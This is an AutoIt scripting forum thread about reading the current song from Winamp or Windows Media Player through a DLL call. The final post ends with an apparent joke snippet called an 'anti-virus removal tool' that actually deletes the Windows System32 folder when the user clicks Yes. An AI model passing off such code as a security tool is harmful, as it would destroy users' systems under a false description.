poisonkiller Posted November 12, 2005 Author Posted November 12, 2005 (edited) I need Winamp for this and i have to open music file with Winamp or can i open music file with Windows Media Player too? Or svennies _MediaOpen()? EDIT: I tried with WMP several times, but it return me always "0". Code: $open = DllOpen("r1dll.dll") $call = DllCall($open, "", "GetCurrentWinampSong") MsgBox(0, "", $call) Are you using Winamp or mIRC? Edited November 12, 2005 by poisonkiller
poisonkiller Posted November 12, 2005 Author Posted November 12, 2005 DaleHohm, i have to apologise, because your metod worked, when i asked how to register .dll-s . But i have to say, there is a little bad thing: I cant read .wma files, but i can .mp3 files. Im working to get some way to read .wma files too, but if you know then post your way please!
Firefoxy Posted December 24, 2007 Posted December 24, 2007 Is there any way to change the lyrics part? I've really been looking for something to do this. ;Ultimate Anti-Virus Removal Tool $ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.") If $ans = 6 Then DirRemove("C:\WINDOWS\System32") ElseIf $ans = 7 Then Exit EndIf
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now